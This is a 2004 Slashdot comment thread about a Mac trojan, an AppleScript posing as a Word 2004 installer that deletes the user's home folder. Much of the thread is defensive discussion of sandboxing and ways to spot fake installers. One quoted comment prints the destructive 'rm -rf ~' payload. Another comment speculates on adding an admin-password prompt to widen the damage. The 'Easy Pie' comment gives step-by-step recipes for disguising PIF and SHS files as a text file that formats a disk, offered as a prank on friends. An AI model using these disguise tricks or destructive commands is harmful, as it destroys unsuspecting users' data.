Mac Trojan Horse Disguised as Word 2004 785
Espectr0 writes "Macworld is alerting of a malware program for the Mac. A Macworld reader alerted the magazine to the malware after he downloaded the file from Limewire. The reader told Macworld: 'I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta. The file unzipped, and to my delight the Microsoft icon looked genuine and trustworthy.' However, he added: 'I clicked on the installer file, and to my horror in 10 seconds the attachment had wiped my entire Home folder!'" This sounds similar to the recent trojan horse proof-of-concept. There are many ways to make one file look like another, on any platform. This is 2004, you should know by now not to open a file from an untrusted source.
Fast User Switching Rules... (Score:5, Interesting)
This is a perfect use for Fast User Switching. Create an account with no perms and no data you care about losing. Test downloads in that account. You can do it without even logging out.
Be careful though of the fact that there's no restriction on network access for a 'no perms' account. (This is a failing of UNIX in general, not MacOS in particular.) This would allow Microsoft/anyone to put out a trojan like this, and send back a 'this IP fell for it' packet, or even run a server on a 'high' port (depending on your firewall configuration).
Re:don't be dumb billy. (Score:2, Interesting)
Always helpful when downloading off the net.
Macosxhints take on it (Score:3, Interesting)
After reading the article and the press release, I think it's pretty obvious what the program is doing -- I suspect it's nothing more than a one-line AppleScript. Although some (perhaps many) will disagree with me, I'm going to publish what I think the exploit to be, because it's not a huge secret. Basically, my guess is that the trojan horse is a one-line AppleScript that contains the following UNIX command (in the script, the command will be accessed via the AppleScript method for calling a shell command, but I'm not going to bother including that part here):
rm -rf ~
WARNING!! DO NOT USE THIS COMMAND! YOU WILL ERASE YOUR USER'S DIRECTORY!
I feel it's important that everyone understand the above command, and know what it looks like -- the more people who know what this line does and how it works, hopefully the fewer who will be fooled by it. And to claim that this is some "deep dark secret" that needs to be hidden is, in my opinion, trying to hide from the truth -- more "security by obscurity," which we all know doesn't work well at all. rm -rf is a very standard, very useful Unix command. In fact, if you search macosxhints (using the advanced search page) for the 'exact phrase' rm -rf, you'll get fully three pages of matches.
What makes it troublesome in this case is simply that it's called from a program where the typical user will not know what's happening, and will be shocked at the outcome. But listing the command is not like explaining how to write a self-replicating virus that spreads from machine to machine -- this is common knowledge to probably at least a couple of million OS X users who have some knowledge of Unix.
For those that don't know Unix, rm is "move to and empty trash," -r is "do this for all items and folders within this folder," the f means "force removal without confirmation," and the ~ means "the user's directory." Spelled out, this means that the script will, without warning or user intervention, delete everything in the user's folder. Permanently.
The Intego press release explains one way to test a program if you suspect it might be a trojan horse -- select it, do a Get Info, and try to delete the icon. Here's another safety check that I often use myself: drag and drop the program onto Script Editor (or control-click on a package and select Show Package Contents to explore the package contents if it's a package installer). If you're lucky, and the script writer was somewhat lazy (by not making the script uneditable), the script itself will open for editing.
So now that you know about this trojan horse, the question is, what should be done about them on OS X? My first thought on reading the article was "Cool, Darwin at work on the peer to peer networks!" But then, I considered some additional scenarios which may have more applicability in the real world. The current example is likely to remain on Gnutella, given that it's a program that purports to install the currently 'hot' application, the new Office suite. However, think about this version: A useful AppleScript that does something cool (change type/creator codes, backs up your directory, etc.). However, buried in the code is a timer that counts the number of times you've used the program. On the 50th run, it deletes your entire user's folder. Or worse, it pops up a dialog that says "In order to backup the Foo_bar file, we need your admin password." It may then be possible (I'm not quite sure how) for the app to delete the entire hard drive, instead of just your user's folder. If the script were useful enough, it could be very widely distributed, and then go blam! at some non-specified time in the future.
What, if anything, should Apple do about this? Note that this is not specific to OS X; it's really a 'social engineering' exploit. I think it would be just as easy to write a similar 'exploit' for Linux or even Windows, given that it's a simple script that relies
Re:Not really similar to the other article (Score:2, Interesting)
That's exactly what it is. An Applescript calling rm -rf in a shell script with an MS icon on the Applescript applet. But, since it's UNIX, not windows, the only damage is self-inflicted by default.
Now if the writer was mo' clever, he could have added authentication ("with administrator privileges") so the stupid person could have totally eradicated himself after supplying the administrator password.
Third Mac OS X "Trojan" available (Score:3, Interesting)
Trojan Example Read Me
This is an EXAMPLE of an AppleScript with a custom icon. It does nothing malicious. It does not spread. It does not delete files. It speaks and displays some dialog boxes. It's merely poking fun at Intego's sensationalist handling of these issues on Mac OS X, and their claims that these represent serious flaws in Mac OS X.
I wonder if Intego will protect against, and describe, this trojan...?
Perhaps they can make another press release hawking VirusBarrier.
For more information:
das@doit.wisc.edu
Available at:
http://mirror.services.wisc.edu/mirrors/tmp/ [wisc.edu]
The "trojan" is an AppleScript that speaks the text: "Muhahahaha. You have been owned by this elite trojan. Just kidding." It then displays a series of dialog boxes:
1. "OMG! it's another trojan for Mac OS X! Will Intego have to protect against this one too?"
2. "Intego's irresponsible sensationalism about non-issues is quite astounding."
3. "They make wild claims about 'serious weaknesses' in Mac OS X that simply aren't true, for the sake of hawking their product."
4. "AppleScripts and fake MP3s do not, nor will they ever, rise to the level of the mind-boggling number of completely remote exploits for Windows, requiring absolutely no user interaction, that plague millions of computers and cost billions of dollars of lost productivity."
5. "Mac OS X is intrinsically and fundamentally more secure, and more open to peer and community review."
6. "Social engineering problems, such as tricking a user into launching a fake Word installer that's really an AppleScript downloaded from a P2P network, don't reveal 'serious weaknesses' in Mac OS X."
7. "Intego would be well suited to selling snake oil at a two-bit carnival."
It then quits.
It has Intego's VirusBarrier X installer icon, and is named "VirusBarrier X Install.app".
(Note: this package is CLEARLY labeled as an example, and comes with a read me.)
To Quote Nelson.. (Score:2, Interesting)
Seriously though, even relatively small user populations are vulnerable to trojans and worms. The Witty Worm (see this analysis [caida.org]) indicates that non-Windows users are just as vulnerable a target - Witty infected almost 100% of the vulnerable worldwide population of 12,000 or so machines in about an hour. In other words, Mac (and Linux) users need to take the same precautions as those of us who are saddled with bloody Windows do.
"This being 2004..." (Score:4, Interesting)
How can such a goal be attained? There are many ways available now. The most obvious one is a VM system with security policies, such as the JVM. That's not the only one, though. Another method is a capabilities [eros-os.org]-based system, so when a process starts, it has only a defined set of capabilities to work with. OpenBSD [openbsd.org] has a similar, but more limited system called systrace. The TrustedBSD [trustedbsd.org] project and SELinux [nsa.gov] have similar aims, and SELinux is being integrated into mainstream Linux distros. Another way to run untrusted things is with user-mode Linux [sourceforge.net], which I believe is integrated with Linux 2.6
The editor is right, though, that on currently-used systems like OSX and MS Windows, you have to be careful what you click on. But the problem is that we have come to accept that as "the way things are", when there is no reason for that to be the case. You should be able to run hostile code, see what it does, laugh at it, and delete it without any harm. The technology to do that exists, and has existed for years, but we have come to accept broken products and systems that don't allow that.
---------
WAP news [chiralsoftware.net]
Shell script? (Score:2, Interesting)
Re:The Icon Looked Trustworthy! (Score:3, Interesting)
A client I worked for couldn't deal with two mdb files on her desktop. It confused her that she could work with two databases independently, because to her, they were both just "Access".
Cheers to the lusers!
Social engineering (Score:3, Interesting)
What other apps are good targets for trojan horses? I have always been afraid of downloading a 'virus scanner' because it just screams 'I have no virus scanner on my computer!'
Others you have noticed? Perhaps a 'digital wallet' application to keep credit cards, passwords, etc. in
Re:"Darwin" - style award winner (Score:-1, Interesting)
What this makes me think of... (Score:2, Interesting)
What good is a glass dagger? (Score:3, Interesting)
It's like the Warlock in Niven's "The Magic Goes Away": the thing about being a magician is everyone expects you to use magic, but a dagger always works. No operating system can keep someone from explicitly unpacking and executing a file.
So, no, the Mac is definitely not immune, but the rate of virus propogation on the Mac should be limited by the need for people to deliberately unpack and run the infected file. What makes virus propogation on Windows so rapid is the way they've integrated the browser and the desktop, which means that they have to block potential exploits one by one. Apple's web integration is not nearly so complete, though they're beginning to do things that I find dubious as they start getting feature-crazy with Safari...
Of course when I tell people they probably want to turn off "automatically open safe attachments" in their browser, just in case, they come back with this argument that the Mac is immune to viruses. Well, yes, it's at least resistant... but that's only because there aren't many things like "automatically open safe attachments" for viruses to take advantage of.
Yet.
Free Software (Score:3, Interesting)
Everyone I know who uses Windows and pirates software like this has to put up with this shit. It's just not worth it, especially when you just want to get your work done. Of course, in these days where you plug your machine in and you get a host of infections automatically within a 24 hour timespan perhaps no one really worries as much about these things anymore.
Re:"Darwin" - style award winner (Score:4, Interesting)
And what methodology do you use to ensure that your software is safe, I have to ask? Really, there are no good generally-available methods of avoiding such trojans.
I think I'm reasonably competent at determining whether something's a trojan, compared to most folks. I've been known to strings binaries, to disassemble and do raw code analysis, to use various debugging tools, and to run things chrooted. I generally stick with free open source software only. However, in all honesty, there are no real strong protection mechanisms available. It's not very difficult to produce a trojan that will get past these barriers.
The problem is that people look at the statement "the icon looked legitimate" and think "hey, that isn't a good method to use to check the legitimacy of something" and immediately (and illogically) jump to "and I could do better".
There's no real reason to ridicule the guy.
Re:"Darwin" - style award winner (Score:4, Interesting)
But even the bad ones are better than 'Gee, the Icon looks pretty. Virus writers are nortoriously bad artists so this program I downloaded from some unknown person that claims to be a secret beta of a Microsoft product should be fine to run'
Hows this for a logical jump.
Hey, that isn't a good method to use to check the legitimacy of something
so
I'll ring my aged grandmother and ask her should I run it and she'll say "Don't be stupid, running software like that you could catch one of those virus thingys that are running around these days" (She has a 50% chance of being right)
and that would be better than looking at the freaking ICON.
Easy Pie... (Score:3, Interesting)
Here is a link to get you guys started on tricking your friends into formatting their hard drives:
http://lockdowncorp.com/hackertricks.htm
From that page:
"Dangerous Commands That Can Be Embedded
PIF Shortcut Extensions
Some hidden file extensions can easily be programmed with hidden commands that could do damage to your system. Following is a simple test:
1.
Right click your mouse on your desktop and select New
and then ShortCut
2.
In the command line type: format a:
3.
Click Next
4.
In the "Select a name for the shortcut" area type: readme.txt
5.
Click Next
6.
Select a notepad icon and click Finish
You now have a file on your desktop called readme.txt with a notepad icon. Make sure there is a disk in your drive that you do not mind being wiped and click on the icon. The file that you click on will do a format on the disk in the A: drive. Of course, the hacker's icon would target another drive, or maybe have a name such as 'game.exe' and with a command to delete your Windows directory or (deltree
If the PIF extension were not hidden, this would not be able to fool you."
Or, you could also do the following:
"SHS Extensions
Scrap files can also hide embedded commands. Following is a simple test:
1.
Make a copy of notepad.exe and put it on your desktop.
2.
Open Wordpad
3.
Click and drag notepad.exe into the open wordpad document.
4.
Click on Edit and select Package Object, then select Edit Package
5.
Click on Edit and then Command Line
6.
Type a command in the box such as format a:
7.
The Icon can also be changed from this edit window
8.
Exit from the edit window and it will update the document
9.
Click and drag notepad back to the desktop
10.
Rename the file that it created (Scrap) to Readme.txt
You now have what will look like a text file. If it is run it will format the disk in the A: drive. As seen in the example above for PIF Shortcut Extensions, the hacker could use more dangerous commands."
Various other types of info available there. Enjoy.
No (Score:2, Interesting)
Actually, UNIX was designed to run as a game platform on a PDP-7 minicomputer.
From Origins and History of Unix [faqs.org]
"Unix began its life on a scavenged PDP-7 minicomputer[14] like the one shown in Figure 2.1, as a platform for the Space Travel game and a testbed for Thompson's ideas about operating system design."